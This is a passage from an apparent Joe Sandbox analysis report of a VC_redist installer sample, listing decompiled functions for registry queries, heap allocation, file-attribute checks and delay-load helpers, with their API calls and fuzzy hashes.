                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F5728 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E000F5728(void* __ecx, intOrPtr _a4, short* _a8, intOrPtr _a12, char** _a16) {
				void* _v8;
				void* _t13;
				char** _t24;
				void* _t27;

				_push(__ecx);
				_v8 = 0;
				_t13 = E000F5664(__ecx, _a4,  &_v8); // executed
				_t24 = _a16;
				_t27 = _t13;
				if(_t27 == 0x80070002 || _t27 == 0x80070003) {
					L5:
					_t27 = 1;
					goto L6;
				} else {
					if(_t27 < 0) {
						L6:
						if(_v8 != 0) {
							RegCloseKey(_v8);
							_v8 = 0;
						}
						if(_t27 == 1 || _t27 < 0) {
							if(_a12 != 0) {
								_t27 = E000B21A5(_t24, _a12, 0);
							} else {
								if( *_t24 != 0) {
									E000F54EF( *_t24);
									 *_t24 = 0;
								}
							}
						}
						return _t27;
					}
					_t27 = E000F0F6E(_v8, _a8, _t24);
					if(_t27 == 0x80070002 || _t27 == 0x80070003) {
						goto L5;
					} else {
						goto L6;
					}
				}
			}







                                                                          0x000f572b
                                                                          0x000f5738
                                                                          0x000f573b
                                                                          0x000f5740
                                                                          0x000f5743
                                                                          0x000f574b
                                                                          0x000f5777
                                                                          0x000f5779
                                                                          0x00000000
                                                                          0x000f5755
                                                                          0x000f5757
                                                                          0x000f577a
                                                                          0x000f577d
                                                                          0x000f5782
                                                                          0x000f5788
                                                                          0x000f5788
                                                                          0x000f578e
                                                                          0x000f5797
                                                                          0x000f57b2
                                                                          0x000f5799
                                                                          0x000f579b
                                                                          0x000f579f
                                                                          0x000f57a4
                                                                          0x000f57a4
                                                                          0x000f579b
                                                                          0x000f5797
                                                                          0x000f57bc
                                                                          0x000f57bc
                                                                          0x000f5765
                                                                          0x000f576d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f576d

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,0011AAA0,00000000,?,00000000,?,000C890E,WiX\Burn,PackageCache,00000000,0011AAA0,00000000,?,?), ref: 000F5782
                                                                            • Part of subcall function 000F0F6E: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,?), ref: 000F0FE4
                                                                            • Part of subcall function 000F0F6E: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 000F101F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$Close
                                                                          • String ID:
                                                                          • API String ID: 1979452859-0
                                                                          • Opcode ID: ac70181026885921c9c2aeb9d13c70f8461657c37c5c187a12f5ac4a276cd0a7
                                                                          • Instruction ID: cc42ccf2dca8ecbf6e78b3ca41d469325a2b5da42c317b02532bd0574ae26317
                                                                          • Opcode Fuzzy Hash: ac70181026885921c9c2aeb9d13c70f8461657c37c5c187a12f5ac4a276cd0a7
                                                                          • Instruction Fuzzy Hash: 7311A336804B2DEBCB217EA4FC819BEB6A5EB44322B150239EF1167911C3314D50FAD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000E523F Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E000E523F(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x11b5b8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E000E4A8E();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E000E3E36())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E000E4ADD(_t15, _t16, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}










                                                                          0x000e523f
                                                                          0x000e5245
                                                                          0x000e524a
                                                                          0x000e5258
                                                                          0x000e5258
                                                                          0x000e525e
                                                                          0x000e5260
                                                                          0x000e5260
                                                                          0x000e5277
                                                                          0x000e5280
                                                                          0x000e5288
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000e5268
                                                                          0x000e526a
                                                                          0x000e528c
                                                                          0x000e5291
                                                                          0x000e5297
                                                                          0x00000000
                                                                          0x000e5297
                                                                          0x000e526d
                                                                          0x000e5272
                                                                          0x000e5273
                                                                          0x000e5275
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000e5275
                                                                          0x00000000
                                                                          0x000e5277
                                                                          0x000e5250
                                                                          0x000e5251
                                                                          0x000e5256
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000E6113,00000001,00000364), ref: 000E5280
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: d55358489f8bed0e93b467f65386de7c7a6e0304d0a31fe074f6a2b3bcff43c6
                                                                          • Instruction ID: fecd06b533485c116870f1271f4bfdd8447dc3feeaabf8f3607ba89d5315dc08
                                                                          • Opcode Fuzzy Hash: d55358489f8bed0e93b467f65386de7c7a6e0304d0a31fe074f6a2b3bcff43c6
                                                                          • Instruction Fuzzy Hash: 3AF02B315449A05E9FB45A638C04A9F37889F43775B1D4915EE04BB181CB20DC004AD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000E5154 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 94%
                                                                          			E000E5154(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E000E3E36())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x11b5b8, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E000E4A8E();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E000E4ADD(_t7, _t8, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}








                                                                          0x000e5154
                                                                          0x000e515a
                                                                          0x000e5160
                                                                          0x000e5192
                                                                          0x000e5197
                                                                          0x000e519d
                                                                          0x00000000
                                                                          0x000e519d
                                                                          0x000e5164
                                                                          0x000e5166
                                                                          0x000e5166
                                                                          0x000e517d
                                                                          0x000e5186
                                                                          0x000e518e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000e516e
                                                                          0x000e5170
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000e5173
                                                                          0x000e5178
                                                                          0x000e5179
                                                                          0x000e517b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000e517b
                                                                          0x00000000

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,000E1E90,?,0000015D,00000001,?,00000001,?,000E32E9,000000FF,00000000,?,?), ref: 000E5186
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: db854789378e986be90772cdc8923b68b8dc2a4b6fa2439fa832bdcae9e12be7
                                                                          • Instruction ID: e8e9216ae83b5d14d2d5d44e0a8bed756ec7938cd5384bce6c3c7bdf983ab4de
                                                                          • Opcode Fuzzy Hash: db854789378e986be90772cdc8923b68b8dc2a4b6fa2439fa832bdcae9e12be7
                                                                          • Instruction Fuzzy Hash: AFE02B31240BE49FD67127278C14B9F368DDF827FAF0945A1AC25B24C1DB20CC0085E2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B34C5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00000000,00000000,00000104,00000000,?,000C89CA,0000001C,?,00000000,?,?), ref: 000B34E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPath
                                                                          • String ID:
                                                                          • API String ID: 1514166925-0
                                                                          • Opcode ID: 37976d65373f452f82d1d9c5494d9d35b6512d1c0efb7aa2230f4161a9818ace
                                                                          • Instruction ID: bf0052ffde5eb6fdf5739cbe24fa7670f5faa487edff25b7cfafc8d44f7fe93c
                                                                          • Opcode Fuzzy Hash: 37976d65373f452f82d1d9c5494d9d35b6512d1c0efb7aa2230f4161a9818ace
                                                                          • Instruction Fuzzy Hash: 1CE05B723012257BE7022E729C05DEB7B9CDF057507048061FE44D6001EB75FA1097B0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B40E2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000B40E2(WCHAR* _a4, signed char* _a8) {
				signed char _t5;
				signed char* _t7;
				void* _t8;

				_t8 = 0; // executed
				_t5 = GetFileAttributesW(_a4); // executed
				if(_t5 != 0xffffffff && (_t5 & 0x00000010) != 0) {
					_t7 = _a8;
					if(_t7 != 0) {
						 *_t7 = _t5;
					}
					_t8 = 1;
				}
				return _t8;
			}






                                                                          0x000b40e9
                                                                          0x000b40eb
                                                                          0x000b40f4
                                                                          0x000b40fa
                                                                          0x000b40ff
                                                                          0x000b4101
                                                                          0x000b4101
                                                                          0x000b4105
                                                                          0x000b4105
                                                                          0x000b410a

                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,00000000,?,000CA229,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,?), ref: 000B40EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: a165cfa386b775d9f7a31527f4e4870f2d6807a757399eccedf00c187e2aa5cc
                                                                          • Instruction ID: f06497690b83f8ff0eb42348b16ce79ea33c1318a614a4a7b7d25ae90516768d
                                                                          • Opcode Fuzzy Hash: a165cfa386b775d9f7a31527f4e4870f2d6807a757399eccedf00c187e2aa5cc
                                                                          • Instruction Fuzzy Hash: 3CD02E32A02128174B288EAD8C045EABBAAEF227B03418614EC14CA2A1C3308E92C7C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000EF349 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E000EF349() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E000F9814(_t3, _t5, _t7, 0x118024, 0x11a94c); // executed
				goto __eax;
			}






                                                                          0x000ef353
                                                                          0x000ef354
                                                                          0x000ef35b
                                                                          0x000ef362

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000EF35B
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: 291f07788fb6ba882ed62f3ea5f0303f4700260d5959dc25b21f02156dfe8845
                                                                          • Instruction ID: decec4ef5b5a44e1e2b788ab3e78b7f989e2d585ba53a911e55ae576dca9828f
                                                                          • Opcode Fuzzy Hash: 291f07788fb6ba882ed62f3ea5f0303f4700260d5959dc25b21f02156dfe8845
                                                                          • Instruction Fuzzy Hash: F8B0129235944A7C330C13216E02CBA025DC7C1F28335C03AB600E1041ED800EC61032
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000EF36A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E000EF36A() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E000F9814(_t3, _t5, _t7, 0x118024, 0x11a944); // executed
				goto __eax;
			}






                                                                          0x000ef353
                                                                          0x000ef354
                                                                          0x000ef35b
                                                                          0x000ef362

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000EF35B
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: 031608565aeee76063337dae9bf4fb38df24fc1e86ff8341a0a899a96a3312cd
                                                                          • Instruction ID: d4afa218da0abd9515d8deacf1ec1c76fea5baa5cc82e7dcf5f52259aa90a4e7
                                                                          • Opcode Fuzzy Hash: 031608565aeee76063337dae9bf4fb38df24fc1e86ff8341a0a899a96a3312cd
                                                                          • Instruction Fuzzy Hash: 8FB0129135940A6D334C53251F03DBA015DC7C5F24335C03AB100D2042ED800DC71032
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000EF37A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E000EF37A() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E000F9814(_t3, _t5, _t7, 0x118024, 0x11a948); // executed
				goto __eax;
			}






                                                                          0x000ef353
                                                                          0x000ef354
                                                                          0x000ef35b
                                                                          0x000ef362

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000EF35B
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: f24a0e5f3918568ddc78417073d60e84f1a084c76e29267fe33030485de32c02
                                                                          • Instruction ID: 6bea6d4c783592ccafe80d67fbf98869df513f02196676febcdcdd9364c31a91
                                                                          • Opcode Fuzzy Hash: f24a0e5f3918568ddc78417073d60e84f1a084c76e29267fe33030485de32c02
                                                                          • Instruction Fuzzy Hash: B4B0129135950A6C334C53251E02DBA015DC7C5F24335C13AF100D6041ED800DC65032
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F94D5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E000F94D5() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E000F9814(_t3, _t5, _t7, 0x1180c4, 0x11a960); // executed
				goto __eax;
			}






                                                                          0x000f94df
                                                                          0x000f94e0
                                                                          0x000f94e7
                                                                          0x000f94ee

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000F94E7
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: 5692c1e25848d871effe21bb871106bed757069c74a5b9d95d2041fb4f81a1c5
                                                                          • Instruction ID: 302ccc452316bd12fca37580b6f1517a2dbdd06b5f7f2d759f6393785be6982b
                                                                          • Opcode Fuzzy Hash: 5692c1e25848d871effe21bb871106bed757069c74a5b9d95d2041fb4f81a1c5
                                                                          • Instruction Fuzzy Hash: 49B0128526960D7C331C22151D82DBA011CDBC0F20331C17BB300E28C1AE401CC76033
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F94F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E000F94F6() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E000F9814(_t3, _t5, _t7, 0x1180c4, 0x11a95c); // executed
				goto __eax;
			}






                                                                          0x000f94df
                                                                          0x000f94e0
                                                                          0x000f94e7
                                                                          0x000f94ee

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000F94E7
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: 5dcba69e16ec1d63bc91fec20979e02ee31e8ebf0ce725ea1a35dd202a166fb6
                                                                          • Instruction ID: a30210e0c668d3ae93cef8ea734143278d4c1b05199133dc7d7f85daf8671c0b
                                                                          • Opcode Fuzzy Hash: 5dcba69e16ec1d63bc91fec20979e02ee31e8ebf0ce725ea1a35dd202a166fb6
                                                                          • Instruction Fuzzy Hash: 75B0128526950E6C335C62151D03EBA010CC7C4F10331C27BB700C34C1EE401CCB2032
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F9506 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E000F9506() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E000F9814(_t3, _t5, _t7, 0x1180c4, 0x11a964); // executed
				goto __eax;
			}






                                                                          0x000f94df
                                                                          0x000f94e0
                                                                          0x000f94e7
                                                                          0x000f94ee

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000F94E7
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: 6cb9ace564436da405fac16629831ebe7689edbaf6bd33efec11e46ced946778
                                                                          • Instruction ID: 50a837471607b082e39f0c9344c68b4d54e1cae27a549935a0678df08792f049
                                                                          • Opcode Fuzzy Hash: 6cb9ace564436da405fac16629831ebe7689edbaf6bd33efec11e46ced946778
                                                                          • Instruction Fuzzy Hash: 25B092852696096C225862552A42EBA0108CBC4B10321817AB204D2482AA401CC76032
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B1360 Relevance: 1.3, APIs: 1, Instructions: 88stringCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000B1360(WCHAR** _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t22;
				signed int _t26;
				signed int* _t28;
				int _t31;
				unsigned int _t32;
				signed int _t34;
				signed int _t38;
				unsigned int _t39;
				unsigned int _t40;
				WCHAR** _t41;
				void* _t42;

				_v8 = _v8 & 0x00000000;
				_t41 = _a4;
				_v12 = _v12 & 0;
				_v16 = 0;
				if( *_t41 == 0) {
					L4:
					_t32 = 0x100;
					_t22 = E000B143C(_t41, 0x100, _a8); // executed
					_t42 = _t22;
					if(_t42 >= 0) {
						goto L5;
					}
				} else {
					_t40 = E000B3B51( *_t41);
					_v16 = _t40;
					if(_t40 != 0xffffffff) {
						_t31 = lstrlenW( *_t41);
						_t32 = _t40 >> 1;
						_v12 = _t31;
						if(_t32 != 0) {
							L5:
							_t38 = _v8;
							do {
								_t42 = E000B1C90( *_a4, _t32, _a12, _a16);
								if(_t42 != 0x8007007a) {
									goto L11;
								} else {
